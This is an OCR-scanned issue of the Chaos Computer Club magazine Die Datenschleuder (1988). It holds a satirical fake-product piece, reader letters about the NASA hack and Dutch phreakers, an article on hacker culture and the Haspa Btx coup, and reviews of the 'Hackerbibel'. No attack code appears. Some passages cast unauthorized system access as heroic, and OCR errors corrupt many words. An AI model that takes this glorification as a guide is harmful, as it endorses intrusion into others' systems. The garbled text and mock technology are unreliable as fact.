tuellen Nationalstaaten. Diese Dinge wurden er¬ 
reichbar, nachdem Durchbrüche in der 
Kommunikations-Technologie erzielt wurden, die 
den Äther als Kommunikationsmedium benutzen. 
Durch die Anwendung eines neuen NANO-PDP- 
11/E99 Gateway Ifroccssor Systems, ETHERGATE 
genannt, können DECNet-User nun an jede belie¬ 
bige Stelle der ElheReal-Ebenc gelangen. 

Diese Entwicklung macht Telekonferenzen obsolet, 
da Gruppen nun ihre eigenen Konferenzräume und 
Cafeterias generieren können, was wiederum eine 
Ersparnis an Platz, Reisekosten und Essens-Spesen 
nach sich zieht. In der ersten Version befinden sich 
möglicherweise noch einige Bugs, da eines der er¬ 
sten verschickten Mitglieder der DECNet Reviev 
Group seit dem letzten Treffen, das in einem solchen 
virtuellen Konferenzbereich abgehalten wurde, 
nicht mehr aufzufinden ist. 

Dieser technische Durchbruch ist einem Team von 
Software- und Hardware-Ingenieuren von Distri- 
buled Systems zu verdanken, die die Möglichkeiten, 
die ihnen in Tewksbury, Massachusels, zur Verfü- 
sung stehen, geschickt zu nutzen wußten. Distri- 

Satenädjltuier 


buied Systems hat einen Kompromiß gemacht und 
will ETHERGATE in TWOOO unterstützen, wobei 

es sich um eine Direktverbindung zu ihrem neuen 
Sitz irgendwo im Bereich ihrer neudefinienen 
Middle-Eanh-Realität handelt. Einige Schwierig¬ 
keiten gibt es, da die Relokation von Szenen, Fen¬ 
stern. manipulierter Steuer-Belege. Schwimmbec¬ 
ken undTennisplätze den Ablauf verlangsamen. Der 
Aufbau der Netzwerk-Topologie bleibt unverändert, 
alles ’Fonvarding’ wird vom TWOOO-EtheReal- 
Ebenen-Router erledigt, der sich in dem Krater am 
Ort des ehemaligen Haupisitzes befindet. 

Utility Packages wie EiheReal Person Transfer (EPI) 
und EtheReal Facility Transfer (EFT) bieten um¬ 
fangreiche Möglichkeiten für unterschiedlichsle Be¬ 
nutzer. Raffinierte User können auf einfache Weise 
vermittels höherer Programmiersprachen ElheReal- 
Entiläten generieren (SCREATE), öffnen ($OPEN) 
und löschen (SNUKE), indem sie das EtheReal Ma¬ 
nagement System (EMS) und das EtheReal Access 
Protocol (ERP) benutzen. Ein ETHERTRIEVE- 
Utility zum einfachen interaktiven Gebrauch wird in 
Kürze zur Verfügung stehen. 

DECNet Phase XVIII ist aus der Phase-XVI- 
Akzeptanz hervorgegangen, durch die jedermann 
Zugang zu einem professionellen Digital- 
Armband-Compuiererhalten hat, und führte überdie 
erfolgreiche Architektur der gegenwänigen Phase 
XVII, welche Routing-Kapazitäten bieiet. die eine 
direkte Kontmunikation mit den Aiari-Videospielen 
der gesamten Erdbevölkemng ermöglicht. 

Die Ingenieure von Distributed Systems sind schwer 
beschäftigt mit der nächsten Phase des DECNet. die 
unter anderem Multi-Plane Existence Network Ma¬ 
nagement (unter Verwendung des NIECE- 
Proiokolls) und Galaxy Level Routing mit 64K Bit 
Adressbreiic bieten soll. 

Digital will seine Gateway-Produkte auch weiterhin 
auf der primären materiellen Ebene anbieten. Diese 
Produkte enthalten ein lBM-ANA-(Acronym- 
Based Network Aiciteclure)-Gatcway, außerdem 
TOLKIEN, das die Kontrolle über sämtliche ring¬ 
förmigen Netzwerke erlaubt, und mega-breite Jump- 
Band-Hardware, die auch den jüngsten Produkten 
von Wang ihr angemessenes Plätzchen im Markt 
zuweisen werden. 


Michael Finken, BS2000 Postmasfer 
Übersetzung Ins Deutsche: Poelronic 


Sehe 18 


Söite 19 




Nasa-Hack 

Daten raus umsonst 
und sofort! 

Unverschämtheit! Der CCC fordert seit langem 
die ominöse „Freedom of Information“. Anstatt 
mit gutem Beispiel voranzugehen, zockt er der 
(meistens armen) Hackerbasis einen Hunni für 
die Dokumentation des NASA-Hacks ab. Infor¬ 
mation also nur für die, die sich’s leisten können 
(Presse, Bullen, VS etc.). 

Damit keine Mißverständnisse aufkommen: Wir ha¬ 
ben nichts dagegen, wenn Ihr versucht, eure Kosten 
wenigstens teilweise wieder reinzubekommen. 
NUR: zockt die Kohle gefälligst denen ab, die sie 
haben! Also z.B. DEC. den SPANNET-Betreibem, 
IBM, Gorbi oder sonstwem. Wir fordern also: 

Sofort die gesamte Dokumentation des NASA-Hacks 
in einen öffentlich zugänglichen Teil der CLINCH- 
Mailbox! 

Wer Freiheit der Information fordert und seiner 
eigenen Basis Kohle abnimmt, macht sich UN¬ 
GLAUBWÜRDIG. Ihr denkt kommerzieller als die 
großen Kommunikationsdealer wie Benelsmann. 
Im Übrigen: bildet euch nicht ein, von nichts und 
niemanden abhängig zu sein. Auch ihr seid auf die 
Kooperationsbereitschaft der ,,Szene“ oder „Basis“ 
angewiesen. Wenn ihr euch weiter so verhaltet, ist es 
Essig damit. Daten raus, zack, zack! 

(für die CLINCH-Mailbox ist das Zeug wohl zuviel 
Müll auf einem Haufen, der Sätzer) 

Die Bildschimschänder, 

Sektion Passau 

CCC87ICCCONGRESSICONGRESSI28.12.87121:3911184 Z. 



Wenn unzustellbar 
Anschriftenausschnitt b 
mit neuer Adresse zurüc 

Hallo Sysop, 

Wir wollen gerene informationen tauschen. In di 
Niederlande gibt es ein hackverein, dass ihre mi; 
glieder communicieren lasst durch ein bbs System i 
amsterdam. wir sind sehr interessien was der CO 
vom holländishe hacker weist, und wir wollen ger 
korrespondieren mit die CCC. verzeihe wen was ic 
schreibe nicht richtig Deutsch ist. Ich bin ja ei 
Hollender. Bitte schreibe an die holländische hackei 
postfach 12894, 1100 AW Amsterdam. Die Nie 
derlande. 

Wir hoffen auf eine gute Zusammenarbeit. 

' P.S: wir hacken diverse Systeme und sind beschäftig 
mit datex und phreaking. auch die sociale a.spektei 
von computermisbrauch ist unseres thema. 

CUNCH/SYSOP/GASTI18.01.88120:441651 Z. 


Impressum t 

Die Datenschleuder™ 

Das wissenschaftliche Fachblati 
für Datenreisende 

Ein Organ des ©haos ©omputer ©lub e.V 
Nummer 25 Masrz 1988 

Schwenckesuaße 85 D-2(XX) Hamburg 20 

Tel.: (040) 490 37 57 
f. Presse; (040) 48 37 52 
BTX: *CHAOS# 

Clinch/Geol; Chaos-Team 

Herausgeber: ©haos ©omputer ©lub e.V 
ViSdP; Reinhard Schrutzki 

Mitarbeiter (u.a.); DDT, A. Eichler, P. Franck 
Herwart Holland-Moritz, JWI.H. Kppke, M. Kühn, 
Andy M.-M., J. Nicolas, Rudolf Schrutzki, padelu’un 
Poetronic, S. Stahl, S. Wemery.S . Weirauch 

Nachdruck für nichtgewerbliche Zwecke 
bei Quellenangabe erlaubt. 

Layout &Grahk; Streßtop Publishing 
Satz; BuchMaschine 

Unterdrück im Selbst verlach. 

Seite 20 




Die Gedanken sind frei 
aber wie steht’s mit den Daten? 


Computer-Hacker - kriminelle Mutanten, elektronische Robin Hoods 
oder ein wichtiges Informationsregulativ? 

Von Werner Pieper 


Jede qeue Technologie stößt bei den einen auf Ablehnung, be! den andern auf 
Zustimmung und von einer dritten Gruppe wird sie als Herausforderung ange¬ 
nommen. Bei den Computern ist's genauso. Während eine recht große Bevölke¬ 
rungsgruppe zwischen Bedenken und Angst schwankt, während viele einen 
neuen Arbeitspiatz am Monitor gefunden haben, gibt es auch jene, die mehr wis- 
senl wollen. Hatte es vor Jahren noch den Anschein, als ob das Informations- 
Zeitalter den Bürgerin Form des .Großen Bruders' bedrohen würde, so hat sich 
das BHd verändert. .High Tech' ist nun etwas, mit dem der Konsument arbeitet 
und spielt, Millionen arbeiten dazentralisieii an Ihren Personal-Computern, die 
große Angst vor allmächtigen Supercomputem die alles zentrallslaren Ist vorbei. 
Dank der Hacker. 


In Deutschland sind sie spätestens 
seit dem „Haspa Coup“ ein Begriff. Der 
Hamburger Chaos Computer Club 
wollte beweisen, daß das Btx-System 
nicht so sicher sei, wie es die Betreiber 
behaupteten. Über Nacht ließen sie 
sich von der Hamburger Sparkassse 
130 000 DM auf Ihr Konto ü^rweisen, 
indem sie die Haspa dazu brachten, 
alle paar' Sekunden eine Btx-Seite des 
Clubs abzurufen und das zu einem Sei¬ 
tenpreis von 9,97 DM, Dementis der 
Post und der Bank waren zwecklos, 
Strafanzeigen ebenso. Denn die Hak- 
ker hatten das Geld nicht heimlich stiU 
und leise verpraßt, sondern den Coup 
unter Aufsicht des Datenschutzbeaui- 
tragten durchgeführt. Es ging ihnen 
nicht um das Geld, sie wollten nur be¬ 
weisen, daß es mit der Systemsicher¬ 
heit nicht weit her war. Die Medien 
hatten neue Lieblinge, Vor-Hacker Dr. 
Wau trat gar bei Frank Elsner’s „Leu¬ 
te ’Sd“ auf und Btx wurde für den Be¬ 
treiber ein Reinfall, Eine neue Techno¬ 
logie hatte den Test nicht bestanden. ' 

Natürlich führt die Bundespost auf 
Grund dieser Erfahrungen Jmderun- 
gen und Verbesserungen des Systems 
durch. Bei den Hackern hat sie sich 
bislang aber für diese Anregimgen 
noch nicht bedankt, dabei wäre sie 
vielleicht gut damit traten, dem CCC 
gut dotierte Beraterverträge anzubie¬ 
ten. Es ist ja schon ein paradoxes 
Spiel: die von Hackern entdeckten Lö¬ 
cher im Sy^m Werden natürlich von 
den Betreibem/Herstellem ^ schnell¬ 
stens gestopft So sorgen' Hacker, 
wenn auch indirekt, für sicherere Sy¬ 
steme um anschließend zu Buh-Mäh- 
netn gestempelt zu werden. ^Im Bild¬ 
schirmtext geht das Spiel noch weiter 
dort wirbt die Bundespost sogar mit 
einem der Paradepferde des CCC. Btx 
ist eigentlich nur für StandbUder ge¬ 
eignet Der CCC hat j^och solange 
daran herumgetüftelt bis es gelungen 
ist einen regelrechten ;,Z^ehMtrickf 
film“ zu programrniereji.'Eind'Oeispiefe 


lose Leistung. Potentiellen neuen Btx 
Kunden wird nun von der Post eben 
dieser Film vorgespielt um äirbuzei- 
gen, wozu diöses System in der Lage 
ist, Thema des Filmes: ein „Chaos Mo¬ 
bil“ schießt hier mit „Nuki-Bomben“ 
auf den „Gilb" in Form von kleinen gel¬ 
ben Posthörnchen 


Was soll das? 

Worum geht es diesen Hackern 
überhaupt? Hier eine kleine Selbstdar¬ 
stellung: 

„Wir sind unbequem und legen, wie 
die Post sagt atypisches Nutzeryerhal- 
ten an den Tag (oder die Nacht), Wir 
meinen: das ist nötig. Je steriler un¬ 
sere Umwelt wird, desto notwendiger 
ist es, Leben bineinzubringen. Ange¬ 
fangen hat es mit der Gründung des 
Chaos Computer Qubs vor rund vier 
Jahren. Der nächste entscheidende 
Schritt war das Erscheinen der Daten¬ 
schleuder und die Pflege von elektroni¬ 
schen Informationsdiensten wie Btx 
und den Schwarzen Brettern in Mehl¬ 
boxen und BuUetten Bords bis hin zum 
Chaos Communication Congress. Über 
die Datennetze wurden weltweite Kon¬ 
takte geknüpft, Informationen und An¬ 
sichten ausgetauscht und diskutiert 
Es bildete sich ein Kreis, eine Gemein¬ 
schaft ein loser Haufen von Leuten 
aus den verschiedensten Richtungen, 
die über Perspektiven, Möglichkeiten, 
aber auch Gefahren der vielfältigen 
Verwendung neuer Technologien und 
deren Auswirkungen nachzudenken 
begannen.“ 

Ursprüngüch kam der Begriff Hak- 
ker aus Amerika. Dort hatten sich 
schon vor Jahren am Massachusetts 
Institute of Technologie Leute nachts 
in die stillgelegten Computer „ge¬ 
hackt" um ungestört arbeiten zu kön¬ 
nen. Daruih geht es ja häufig 
Hacken: wie kommt man in große 


Rechner um Arbeiten ausführen zu 
können, zu denen die Leistungskraft 
des eigenen PC nicht ausreicht. Da¬ 
durch wird niemand direkt geschädigt 
D. h., man ist gerade dabei sich zu 
überlegen, wie man solchen „Zeitdieb¬ 
stahl“ ahnden kann und soll. Das Hak- 
kerwesen hat seine Wurzeln in den 
wilden 60er Jahren. Eine Subkultur, 
hat überlebt und blüht jetzt erst richtig 
auf. Hacker haben Macht, wobei sie 
der Macht mißtrauischer gegenüber¬ 
stehen als andere. Hacker sind häufig 
Einzelkämpfer, aber als Gruppe ver¬ 
schmelzen sie schnell zu einer Einheit 
Es gibt' kaum Frauen unter ihnen, 
mehr schüchterne, picklige Jungs, die 
beim Sport in der Schule oder auch in 
der Disco nie in der ersten Reihe stan¬ 
den, aber jetzt „ihr Dingen“ gefunden 
haben; Ihre Sprache ist neu imd für 
Normalbürger kaum verständlich. Sie 
reden ln Kürzeln und Codes, es klingt 
wie neuzeitliche Poesie. 

Hacker sind keine Crasher 

Bei einem Hacker-Treffen in den 
USA trafen sich auch altgestandene 
Computer-Cracks wieder, z. B. Steve 
Wozsnlak, der Begründer von Apple 
Computer. Nach wie vor ist es mehr 
das Abenteuer Computer das ihn reizt, 
nicht die Vermarktung, nicht der Auf- 
sicbtsrat-Job in einer Weltfirma. Ein¬ 
mal ist es derselbe alte Forschergeist, 
der ihn beseelt; zum anderen auch die 
Sorge um Mißbrauch der von ihm ent¬ 
wickelten Maschinen, wobei sich der 
Begriff „Mißbrauch“ unterschiedlich 
definieren läßt Hacker sind keine 
Crasher. Crasher steigen in fremde 
Computersysteme ein und vernichten. 
Crasher sind destruktiv. Die Hacker 
sind die guten Helden der Computer- 
Revolutioa Sie haben sogar ihre ei¬ 
gene Ethik entwickelt 

„1. Zugang zu Computern und allem, 
wes Dich etwas über die Welt lehrt, 
sollte unbegrenzt seiii. 2. SümtUche In¬ 
formationen sollten frei sein. 3. Mi߬ 
traue der Autorität — fördere Dezen- 
trsiUsatioa 4. Hacker sollten auf Grund 
ihrer Fähigkeiten beurteilt werden, 
nicht auf Grund von akademischen 
Rängen, ihrem Alter, ihrer Rasse etc. 

5. Du kannst mit Hilfe des Computers 
Kunst und Schönheit erzeugen. 

6. Computer können Dein Leben ver¬ 
bessern.“ (Steven Levy) 

Computer können das Leben verbes¬ 
sern, sie müssen es aber nicht unbe- 
üBngt Jls kohlte* lolMBrlichiädeh 
an, was man unter einem „verbesser- 




ten Leben“ versteht. So schildert ein 
überzeugter Computer-Arbeiter seine 
Situation: 

„Seit fünf Jahren arbeite ich mit 
Computern, seit zwei Jahren besitze 
ich einen. Meine mentalen Gewohn¬ 
heiten haben sich verändert. Ich be¬ 
merke drei dominierende Veränderun¬ 
gen: Ich arbeite schneller, aber habe 
das Gefühl keine Kontrolle über meine 
Zeit zu haben. Ich spiele mit neuen Ty¬ 
pen kreativer Maschinen, habe aber 
keine Ahnung, wie ich sie beurteilen 
soll. Ich arbeite effektiver und spare 
Zeit, verplempere sie aber wieder beim 
Durchforsten von unbezwingbaren 
Bergen von Druckinformationen über 
Computer und die Computerindu¬ 
strie.'* 


Verändertes Zeitgefühl 

So geht es vielen Hackern: die sozia¬ 
len Kontakte schrumpfen, das Zeitge¬ 
fühl verändert sich, eine Art Suchtver¬ 
halten stellt sich ein; ein legales Sucht¬ 
verhalten, ohne daü es bei der Droge 
Nachschubschwierigkeiten gibt 

Für i mm er neue Anregimgen sorgt 
das Vereinsorgan des Chaos Computer 
Club, dis „Datenschieuder“, ein regel¬ 
mäßig erscheinendes Fachblatt, das 
für den Laien viele kodierte Geheim¬ 
nisse enthält Rir den Fachmann für 
Datenfernübertragungen zur Pflieht- 
lektüre gehört; Hacker wie für 
Postler. Der CCC hat auch ein dickes 
Buch herausgegeben, die „Hackerbi- 
bel“, eine grundlegende Sammlung 
von Beiträgen von und über Hacker. 
Um diese Publikationen verstehen zu 
können, erfordert es schon einiges an 
Englisehkenntnlssen und ein wenig 
Fachwissen wird auch vorausgesetzt 
In diesen Publikationen finden sich 
keine Anleitungen, wo man sich wie in 
andere Systeme „einhacken“ kann, 
sondern mehr theoretischer Unterbau: 
wozu das alles gut ist oder sein soll 
oder sein kann. 

Da gibt es z. B. die Geschichte der 
Europaparlamentarier, denen in Lu¬ 
xemburg eine Rechenanlage zur Ver- 
fügimg steht, in der alle Daten über die 
europäischen Länder gespeichert sind. 
Der Haken; jeder Parlamentarier 
kann nur die Daten seines eigenen 
Landes abrufen. So ist es nicht ver¬ 
wunderlich, daß anläßlich der High- 
Tech-Woche in Straflburg das Informa¬ 
tionsbüro des CCC von Europapärlä- 
men tariern überl aufen wurd e. Da s 
Büro war den CCCiern von den euro¬ 
päischen Grünen zur Verfügung ge¬ 
stellt worden. Auch das ist erstaunlich; 
während der Anhängerschaft der Grü¬ 
nen im Allgemeinen Technikfeindlich¬ 
keit vorgeworfen wird, arbeiten sie in 
der Tat an einer Demokratisierung der 
Daten. In Bonn erregte MdB Herbert 
Rusche letzthin Aufsehen, als er einen 
Antrag auf Btx für sein Büro stellte. 
Damit hatte man nicht gerechnet, auch, 
wenn Rusche stellvertretend im Post- 
ausscbuß sitzt 


DAS PARLAMENT 

Nr. 32 / 9. August 1986 






Chdos Computer Club 




KäBELSALat 


«SESUMp; 


oatem 


» 


Freiheit für Daten 

Grüne und Hacker haben Gemein¬ 
samkeiten; beide geben sich mit vorge¬ 
gebenen Realitäten nicht zufrieden, 
beiden geht es um eine Demokratisie¬ 
rung des Lebens und der Daten, die 
immer mehr lebenswichtige Entschei¬ 
dungen beeinflussen. Wie elektroni¬ 
sche Robin Hoods befreien die Hacker 
Daten und geben sie dem Volke. Das 
peueste Projekt: man will sich xücht 
damit abfinden. daß Radioaktivitats- 
werte Regierungssache sind. Also ver¬ 
sucht man, sich in die entsprechenden 
Informationsquellen einzuhacken und 
parallel dazu ein alternatives Meßnetz 
zu knüpfen, damit man zukünftig nicht 
mehr auf die umstrittene Informa¬ 
tionspolitik in Krisenfällen angewie¬ 
sen ist. Die aktuellsten Informationen 
über Strahlungen nach Tschernobyl 
fanden sich nicht in den Zeitungen, 
sondern in der Mail Box. 

Jedes Jahr zwischen Weihnachten 
und Neujahr trifft sich die Hacker- 
Szene beim großen „Chaos Congress“ 
in Hamburg. Viele die sich bislang nur 
auf. elektronischer Ebene kennenge- 
lemt haben, begegnen sich dort erst¬ 
malig in Fleisch und Blut Da werden 
aus Nummern, Codes und Paßwörtern 
richtige Menschen. Gerade im Um¬ 
gang mit heiklen Daten ist es doch 


sehr wichtig zu wissen, mit wem man 
es zu tun hat Vor dem Monitor sind 
alle gleich, dem Computer ist es egal, 
ob der Bediener Mann oder Fräu, Kind 
oder Greis, schwarz oder weiß ist Die 
Kongreßzeit ist wohl gewählt in den 
Rauhnächten trafen sich schon unsere 
Altvorderen tun sich die wunderlich¬ 
sten Geschichten zu erzählen. Das ist 
gelebter, radikaler TraditionaUsmus. 
Inzwischen hat sich der Chaos Con¬ 
gress zu einem Elreignis europäischen 
Formats entwickelt Hacker gibt es 
zwar überall, aber so chaotisch und 
trotzdem effektiv organisiert sind sie 
nur in der Bundesrepublik Deutsch¬ 
land. 

Diese Informationspiraten werden 
uns erhalten blfeibdn, solange es elek¬ 
tronische Medien gibt das hegt in der 
Natur der Sache. Da helf eh keine Kla¬ 
gen, keine Gesetze, keine elektroni¬ 
sche Datensicherung. Dem Bürger, der 
ohnmächtig wie der Ochs vorm Berg 
vor dem Computerzeitalter steht mag 
es recht sein, kann er sich doch in den 
meisten Fällen einer gewissen Sympa¬ 
thie für diese Leute nicht verkneifen 
Kein Wunder, daß sich auch Holly¬ 
wood schon des Hacker-Themas ange¬ 
nommen hat denn Hacker-Geschich¬ 
ten sind der Stoff zeitgemäßer Legen¬ 
den. Ein wahrhaft klassisches Thema: 
den Großen wird eins ausgewischt der 
kleine Mann freut sich. A 






■ tSUIK ^ 5 4!^ ö * ® / 


I 


HACKERBIBEL 

Chaos Computer Club 



0» 

c 

1/1 


Q. 

(D 

00 

o 


t/1 

(/) 


I 

CO 

o 

3 

3 


Die erste „Hacker¬ 
bibel des CCC“ 

CCC - das Isl kein unbekann¬ 
tes Küael eines Insiderkreises 
mehr, seit Herwart Holland und 
sein „Chaos Computer-Club" im 
letzten Jahr die Hamburger Spar¬ 
kasse mittels Btx über Nacht um 
säte 135 000 DM erleichtert hat¬ 
te. Das Schlagwort vom „Robln 
Hood im Datennetz“ machte da¬ 
mals allerorten die Runde. 

Der Chaos Computer Club, 
Schwarz-Schillings unbequem¬ 
stes Kind, das „atypisches Nutz- 
verhalten“ an den Tag bzw. die 
Nacht legt, wurde vor vier Jahren 
in den Räumen der TAZ gegrün¬ 
det. 

Die Aktivitäten der ,.galakti¬ 
schen Vereinigung ohne feste 
Strukturen“ (CCC über sich 
selbst) wie etwa die Verbreitung 
von Bauanleitungen bzw. Bau¬ 
sätzen von Modems, Strichcode- 
lesern u.ä., die Gründung von 
Datenbanken, der Zugriff und die 
Verknüpfung von Rechnernet¬ 
zen, die internationale Zusam¬ 
menarbeit mit Computernetz¬ 
werken sowie die Herausgabe 
der Zeitschrift „Die Datenschleu¬ 
der" haben diesem lockeren Ver¬ 
ein wenig Sympathien bei Com¬ 
puterfirmen wie bei der Post ein¬ 
getragen. 

Dabei ist das von der „Grünen 
Kraft - Medienexperimente" 
verlegte Buch nicht nur für jene 
Zeitgenossen interessant, die ih¬ 
ren Farblernseher in ein High- 
Tech-Terminal-Tabernakel ver¬ 
wandelt haben und die V/elt aus 
Immer rot unterlaufenen, über- 
nächllgten Pupillen betrachten. 


sondern es ist auch für den inter¬ 
essierten, aber' ahnungslosen 
Laien informativ. 

Dies liegt an der Konzeption 
des Buches als einerseits um¬ 
fangreiche Sammlung von Bau¬ 
anleitungen für Modems, Sohalt- 
plänen, Funkdienst- und anderen 
Verzeichnissen (Seriai-Norm- 
Nummern) sowie ,,Hacker-Tips" 
allgemeinerer Art. An die heran¬ 
zukommen Ist normalerweise 
sehr schwer, weil sich der 
Hacker-Alltag meist an der Gren¬ 
ze der Legalität bewegt. 

Andererseits Ist das Buch 
auch eine Dokumentation der 
Geschichte des „Hackings", die 
sich aus Artikeln verschiedener 
Zeitungen, aus Kongressberich¬ 
ten und aus Aufsätzen mit Them- 
ne wie etwa „Computer für Nica¬ 
ragua“, Computerkriminalität, 
„Computer &. the Totalitarian 
State" u.a. mehr puzzleailig zu- 
sammensetzen läßt. 

Das Buch zeigt damit auch 
dem „nur" politisch interessier¬ 
ten die Gefahren und Möglich¬ 
keiten der neuen Technologien. 
Der CCC zeigt mit seiner prakti¬ 
schen Arbeit, wie man den Über¬ 
wachungsstaat mit seinen eige¬ 
nen Mitteln schlagen kann. 

Die Hackerbibel Teil II isl 
schon in der Mache; wer Lust 
hat, sich daran zu beteiligeti, 
kann seine „Tips und Tricks mit 
Btx" (auch anonym) an das 
Chaos-Team schicken: CCC, 
Schwenckestraße 85, 2000 Ham¬ 
burg. 

Die Hackerbibel, Chaos Compu' 
lor Club, Verlag Grüne Kf®*'’ 
Medienexperimente, 260 S., 

33,33 DM 


Die Hackerbibel 
CCC (Herausgeber) 

Grüne Kraft 1985 

259 Selten, DM 33,33 datawelti/86 

Auf der Buchmesse habe ich es ent¬ 
deckt: Das erste Buch vom Chaos 
Computer Club (CCC). Natürlich 
übers Hacken, Den CCC brauche ich 
wohl kaum vorzustellen, selbst Neu¬ 
linge dürften schon irgendwann ein¬ 
mal von ihm gehört haben, späte¬ 
stens durch den spektakulären "Ein¬ 
bruch" in die BTX-Leitung einer 
Bank, t/iei Jahre CCC-Geschichte, Er¬ 
fahrungen und Aktivitäten sind in 
diesem witzig aufgemachten Buch 
enthalten. Gemäß der CCC-Maxime 
"jeder sollte unzensiert Informatio¬ 
nen austauschen können" beinhaltet 
die HACKERBIBEL Zeitungsaus¬ 
schnitte. Reportagen, Bauanleitun¬ 
gen. Cartoons und Faksimiles von 
Zeitschriften aus der Welt des Hak¬ 
king. Eine bunte Mischung geballter 
Informationen, allerdings unüber¬ 
sichtlich und teilweise recht schwer 
leserlich; vor allem, wenn man der 
englischen Sprache nicht mächtig ist. 

Eine Menge wichtiger Artikel und 
Faksimiles sind aus der englischen 
Originalausgabe abgedruckt. 


CHAOS-COMPUTER¬ 
CLUB IHrsg.) 

Die Hackerbibel 

(Der (•rünc 98, 257 SvUi-n. 

DM 3X50 

W AS zeichnei eine Sub- 
KuUur aus? DalJ sic eine 
Codc-Spr.iclie sprichl. die niclil 
jeder versieht. Was zeichnet die 
Bibel aus? Man muß dran 
glauben . . . 

In unseren an konturierleii 
Revolten armen Zeiten isl das 
Bedürfnis nach aursliindischen 
Helden groß. Aber alle lieben 
Greenpeace. Bleiben nur die 
Hacker: Schließlich fummeln 
sie für uns digitale Analphabe¬ 
ten in den Chips der Mächti¬ 
gen herum. 

Nun hat der durch das 
Knacken von Sparkassenkenn- 
wörlern berühmt gewordene 
Hamburger Chaos-Compuler- 
Club seine fette „Hackerbibel“ 
verlegen lassen. Worum es den 
Hackern geht? Um „freien Zu¬ 
gang zu allen Daten“. 

Hier wird es amüsant- 
brisant. Denn dieser Stand¬ 
punkt widerspricht konträr der 
Lieber-nicht-Haltung kritischer 
und alternativer Provinienz. 
Die sähe nur zu gern nitissive 
Vorhängeschlösser an den Da¬ 
tenbanken und verlagert mit 
Datenschutz und Technikskep¬ 


sis auch das letzte Quanlum 
Verantwortung zu den Bits- 
Technokraten. 

Die Hacker wissen das. Und 
so ärgern sie nicht nur Post und 
Siemens, sondern auch die un¬ 
bedarfte „Scene“. Wer als Laie 
das Buch sichlet, wird es nicht 
kaufen. Über zwei Drittel be¬ 
stehen aus Fachtips und Tricks 
zum Löten und Codieren. Es 
wimmelt von Expertenkürzeln, 
eine Sprache, die nur Hacker 
und ihre intimen Feinde auf 
der anderen Seite des Moni¬ 
tors verstehen. Der Kampf um 
die Verfügungsgewalt über die 
neue Technologie ist nicht Für 
jeden überschaubar. 

Ersiaunlicherweise sind die 
ästhetischen Formen jedoch 
tradiert: aus Alternativzeitun¬ 
gen der ersten Generation, 
kreuz und quer layoulet - 
Chaos komplett. Und fast die 
Hälfte ist in Englisch. 

Trotzdem sind viele Erklä¬ 
rungen zu dieser Mischungaus 
Spontanität. Hi-Tech-Obses- 
sionen und Komniunikations- 
gedusel brauchbar. Zur Selbst- 
iiitcrprctation bedient sich die 
bleiche und clwas diskursarme 
Szene allerdings bei der mor- 

TtUPO/OtZEMBtlt 1985 






Medienexperimente ■ D-6941 Löhrbach 


Chaos Computer Club & AK PoHtlscher Computereinsatz 

DIE STUDIE 

Dar Qrilna Zweig 117 

Entwurf einer sozialverträglichen Gestaltungsalternative für den 
geplanten Computereinsatz der Fraktion „Die Grünen im Bundes¬ 
tag“ unter besonderer Berücksichtigung des geplanten Modellver¬ 
suchs der Bundestagsverwaltung (PARLAKOM). 

Auf der Basis eines im Auftrag des Bundestages erstellten 
umfangreichen Planungskonzepts zur Einführung eines gemeinsa¬ 
men Informations- und Kommunikationssystems für das Parla¬ 
ment, die Fraktionen und die Wahlkreisbüros der Abgeordneten 
galt es, dieses kritisch zu bewerlen und die Gestaltungsmöglich- 
keüen für die Grünen im Bundestag auszuarbeiten... Die Einfüh¬ 
rung der Computertechnik gestaltet sich für die Grünen im Bun¬ 
destag so schwer wie für andere der Ausstieg aus der Atom¬ 
industrie. Für beide geht es an die Strukturen. 

TEMPO zur Studie: „Die berüchtlgste Hacker-Gang der Republik, 
der Hamburger Chaos-Computer-Club, versetzte bislang nur Big 
Brother ln Angst und Schlecken. Jetzt sind die Alternativen dran: 
CCC will die Bundestagsfraktion der Grünen verkabeln...“ 

ISBN 3-925817-17-4 7.50 DM/SFH 



TRAU keiNEM COMFVTW. 

OCN OU NICKT (EVI TRACEN KANNST. 


J\0 FICTION 

Der Grüne Zweig 62 

14 Geschichten zum Thema »...als die Natur die Zukunft über¬ 
nahm« mit Beiträgen der besten Science Fiction Autoren; Frank 
Herbert. Ursula LeGuinn, Herbert W. Franke. Jean u.a.m. Zusam¬ 
menstellung: Werner Pieper. 

ISBN 3-922708-82-X. 160 Seiten, nur noch 5 DM/SFR 


Ludmilla Tüting (Hrsg.) 

MENSCHEN - BÄUME - 
EROSIONEN 

Kahlachiag Im HImalaya - Wege aus der Zerstärung 
Der Grüne Zweig 120 

Weltweit geht es Bäumen und Wäldern zunehmend schlechter. 
Holzraubbau, Tourismus. Energiemißwirlschaft und Umweltver¬ 
schmutzung schlagen ihre Breschen. 

Sei es der Raubbau in amerikanischen Regenwäldern, der Ausver¬ 
kauf afrikanischer Edelhölzer, rutschende Berge im Himalaya oder 
das Waldsterben bei uns: überall wächst der Widerstand der 
Betroffenen. In diesem Buch wird stellvertretend für alle anderen 
die Situation der Menschen im Himalaya dokumentiert, wobei 
besonders auf die „Chipko", die Baumumarmer, eingegangen 
wird. 

Themen; • Die Wälder tm Himalaya • Die Chipko-Sewegung • 
Ökologie-Bewegungen in Indien • Bhutans radikale Umeltpolilik • 
Hörl endlich auf, uns entwickeln zu wollen • Die Legende von der 
Grünen Revolution • Als die Touristen kamen * u.a.m. 

Die Autorin. Ludmilla Tüting. lebt seit 1974 wechselweise in 
Kalhmandu (Nepal) und Kreuzberg (Berlin). Beides Orte, die sie 
gleichermaßen faszinieren. Als engagierte Umweltjournalistin und 
eine der besten Kennerinnen Nepals Ist es ihr ein Anliegen, nicht 
nur Fakten und handfeste praktische Tips wetterzugeben, sie wirbt 
■ auch für ein „sanftes, einfühlsames Reisen'*, von ihr sind unge¬ 
zählte Zeitungsartikel erschienen. Weitere Bücher: Bikas/Binas, 
Kathmandu 1987, und Nepal und Tibet. 1986. 

1 Dieses Buch entstand in Kooperation mit der Aktionsgemein¬ 
schaft Solidarische Well (ASW), Berlin. 

ISBN 3-026»' 7-70 ■* 140 Seiten 13 DM/SFR 


LOOMPANiCS 

The Best Book Catalog In the World 
Der Grüne Zweig 99 

»Der definitive Katalog für den subversiven Alltag« (taz) 

This catalog is an important source for anarchists. survivalists, 
iconoclasts, setf-Hberators, mercßnaries, investigators, drop-outs, 
researchers. and Just about anyone interasted in the Strange, the 
usefui, the arcane, the oddball, the unusual. the unlQue, and the 
diabolicaL 

Eine unglaubliche Anpreisung von Bücherr>. die aus verschieden¬ 
sten Gründen hierzulande nicht vcMBteilbar ist. 

